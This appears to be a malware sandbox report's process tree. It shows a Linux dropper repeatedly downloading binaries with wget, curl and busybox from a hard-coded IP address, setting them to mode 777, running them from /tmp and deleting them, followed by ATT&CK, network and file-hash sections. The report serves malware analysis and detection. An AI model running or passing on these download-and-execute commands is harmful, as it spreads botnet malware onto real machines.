/bin/rmrm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1657
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1658
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1660
-
-
/bin/chmodchmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Executes dropped EXE
PID:1662
-
-
/bin/rmrm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1663
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1666
-
-
/bin/chmodchmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1669
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1670
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Writes file to tmp directory
PID:1671
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1672
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:1673
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:1674
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1675
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1676
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Writes file to tmp directory
PID:1677
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1678
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:1679
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:1680
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1681
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1682
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Writes file to tmp directory
PID:1683
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1684
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:1685
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Executes dropped EXE
PID:1686
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1687
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97